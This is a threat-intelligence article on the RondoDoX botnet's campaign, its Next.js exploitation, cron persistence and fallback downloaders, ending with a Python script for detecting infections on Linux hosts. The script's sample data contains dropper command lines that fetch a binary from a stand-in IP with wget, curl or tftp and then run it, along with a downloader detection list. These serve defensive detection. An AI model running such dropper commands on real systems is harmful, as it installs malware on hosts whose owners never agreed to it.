Is Your Infrastructure Safe From the RondoDoX Botnet?

The threat group behind the RondoDoX botnet has escalated sharply, moving from manual probing to hourly automated attack runs against internet-facing infrastructure worldwide. Analysis of the group's command-and-control (C2) server logs from March through December 2025 shows a persistent and increasingly aggressive campaign that targets vulnerabilities in web applications and Internet of Things (IoT) devices. The operation progressed through three distinct phases. Initially the attackers tested vulnerabilities by hand to identify potential targets. By April 2025 they had moved to automated daily scanning. From July 2025 the campaign entered its most aggressive phase, with payload deployment attempted every hour. The jump in frequency and automation points to a well-resourced, determined adversary intent on maximizing its footprint across diverse network environments in order to deploy cryptominers and other malicious payloads.

The Evolving Attack Vector and Arsenal

The campaign's most alarming development came late in 2025, when the threat actors weaponized a critical vulnerability in Next.js to deliver React2Shell payloads, showing how quickly they adopt newly disclosed flaws. The attack chain begins with broad scanning to identify vulnerable servers using blind remote code execution probes: requests whose injected command produces no visible output in the HTTP response, so the attacker confirms success indirectly (for example through a callback or a timing difference) rather than from the response body. Because nothing unusual comes back in the response, such probes are easily mistaken for ordinary failed requests; the requests themselves are still recorded in web-server and WAF logs, which is where they can be caught. Once a susceptible server is found, the attackers drop tailored ELF binaries that fetch the primary malicious payloads from a network of at least six confirmed C2 servers. The speed with which a newly disclosed (n-day) vulnerability was folded into the campaign highlights the group's capabilities and their commitment to staying ahead of defensive measures. Multiple C2 servers give the infrastructure redundancy: taking down one server does not stop the campaign, and any blocklist has to cover all of them.

Once a system is compromised, the RondoDoX malware brings a set of capabilities designed for long-term persistence and resource monopolization. To survive a reboot it establishes persistence through cron jobs that relaunch the malware at regular intervals. It also seeks out and terminates competing malware and other resource-intensive processes so that the infected system's CPU and memory are reserved for its own work, primarily cryptomining. To maximize its reach, the malware is compiled for a wide range of processor architectures, including x86, x86_64, MIPS, ARM, and PowerPC, so it can infect anything from standard servers to specialized IoT devices. Its downloader tries several fetch tools in turn (wget, curl, tftp, and ftp), so a payload still lands on minimal IoT firmware that ships only one of them, or on hosts where a single tool is blocked, which makes the delivery stage resilient in restrictive network environments.

Fortifying Defenses Against an Agile Threat

Successful defense against the RondoDoX campaign hinged on a multi-layered strategy that addressed both immediate vulnerabilities and long-term resilience. Organizations that mitigated the threat effectively were those that prioritized immediate patching of all internet-facing applications, particularly those using Next.js Server Actions, along with the vulnerable routers and cameras that served as common entry points. Network segmentation proved critical in containing lateral movement, keeping a single compromised host from becoming a network-wide incident. Web Application Firewalls (WAFs) added an essential layer by filtering and blocking malicious requests aimed at application vulnerabilities. Continuous monitoring for suspicious processes, especially those executing from temporary directories such as /tmp, and for cron entries that appear outside normal change management, was instrumental in detecting infections early. As a short-term measure, blocking the IP addresses of the identified C2 servers at perimeter firewalls stopped active exploitation and cut off communication for already compromised devices; because the operators can stand up new C2 servers, such blocklists go stale and need to be refreshed rather than relied on alone.
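The two host-level traces described above, cron-based persistence and payloads run out of temporary directories, can be hunted for with a few lines of Python. The following is an added example, not code from the original page or from the RondoDoX analysis it summarizes. It flags crontab lines and running processes that execute or stage a binary under /tmp, /var/tmp or /dev/shm, or that chain two or more of the fallback download tools the text names (wget, curl, tftp, ftp). The sample crontab lines, process entries and the 198.51.100.7 address are constructed for illustration; the `scan_live()` helper applies the same checks to a real Linux host.

```python
"""Host-level hunt for the two RondoDoX traces described in the text: cron-based
persistence and payloads launched from temporary directories. Added example,
not code from the original page or from the RondoDoX analysis it summarizes."""
import glob
import os
import re
from dataclasses import dataclass

TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")      # world-writable staging dirs
DOWNLOADERS = ("wget", "curl", "tftp", "ftp")     # fallback fetch tools named in the text

_TMP_RE = re.compile(r"(?:" + "|".join(re.escape(d) for d in TMP_DIRS) + r")\b")
_SEP_RE = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")   # shell command separators


@dataclass
class Proc:
    pid: int
    exe: str       # target of /proc/<pid>/exe; ends in " (deleted)" if unlinked
    cmdline: str


def classify_command(cmd):
    """Reason string if `cmd` looks like a dropper/persistence command, else None.
    Signals: a temp-dir path run directly, handed to a shell, or chmod'ed;
    or two or more fallback downloaders chained in one command line."""
    tools, staged = set(), []
    for seg in _SEP_RE.split(cmd):
        toks = [t.strip("\"'") for t in seg.split()]
        if not toks:
            continue
        tools |= {n for n in map(os.path.basename, toks) if n in DOWNLOADERS}
        name = os.path.basename(toks[0])
        targets = toks[1:] if name in ("sh", "bash", "chmod") else toks[:1]
        staged += [t for t in targets if _TMP_RE.match(t)]
    if staged:
        return "runs or stages a binary in a temp dir: " + staged[0]
    if len(tools) >= 2:
        return "download chain with fallbacks: " + ",".join(sorted(tools))
    return None


def cron_findings(lines):
    """(line, reason) for crontab lines whose command part trips classify_command."""
    out = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" has one schedule field; "m h dom mon dow cmd" has five.
        fields = line.split(None, 1 if line.startswith("@") else 5)
        reason = classify_command(fields[-1]) if len(fields) > 1 else None
        if reason:
            out.append((line, reason))
    return out


def process_findings(procs):
    """(pid, reason) for processes whose binary lives in a temp dir (even if
    unlinked after exec) or whose command line is a downloader chain."""
    out = []
    for p in procs:
        deleted = p.exe.endswith(" (deleted)")
        exe = p.exe[:-len(" (deleted)")] if deleted else p.exe
        if _TMP_RE.match(exe):
            out.append((p.pid, "binary in temp dir" + (" (unlinked after exec)" if deleted else "")))
            continue
        reason = classify_command(p.cmdline)
        if reason:
            out.append((p.pid, reason))
    return out


def scan_live():
    """Apply both checks to the local Linux host (/etc/cron*, /var/spool/cron, /proc)."""
    paths = ["/etc/crontab", *glob.glob("/etc/cron.d/*"),
             *glob.glob("/var/spool/cron/**/*", recursive=True)]
    lines = []
    for path in paths:
        try:
            with open(path, errors="replace") as f:
                lines += f.readlines()
        except OSError:          # unreadable, or a directory
            continue
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace")
        except OSError:          # kernel thread, or process already exited
            continue
        procs.append(Proc(int(pid), exe, cmd))
    return cron_findings(lines), process_findings(procs)


# Constructed sample data, not real logs; 198.51.100.0/24 is a documentation range.
SAMPLE_CRON = [
    "# constructed crontab",
    "0 3 * * * find /tmp -type f -mtime +7 -delete",            # benign cleaner, not flagged
    "*/5 * * * * /tmp/.x/sysupd >/dev/null 2>&1",                # persistence from a temp dir
    "@reboot cd /var/tmp; wget http://198.51.100.7/a || curl -O http://198.51.100.7/a "
    "|| tftp -g -r a 198.51.100.7; chmod +x a; ./a",             # fallback download chain
]
SAMPLE_PROCS = [
    Proc(412, "/usr/sbin/cron", "/usr/sbin/cron -f"),
    Proc(2231, "/tmp/.x/sysupd (deleted)", "/tmp/.x/sysupd"),
    Proc(2240, "/bin/busybox", "sh -c 'wget http://198.51.100.7/m.arm7 || "
         "curl -O http://198.51.100.7/m.arm7; chmod +x m.arm7; ./m.arm7'"),
]
```

Run `cron_findings(SAMPLE_CRON)` and `process_findings(SAMPLE_PROCS)` to see the hits on the constructed data, or `scan_live()` on a Linux host. The temp-dir check deliberately ignores commands that merely mention /tmp as an argument (the nightly cleaner in the sample), and the process check still fires when the dropper unlinks its binary after launch, which shows up as a " (deleted)" suffix on /proc/<pid>/exe.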
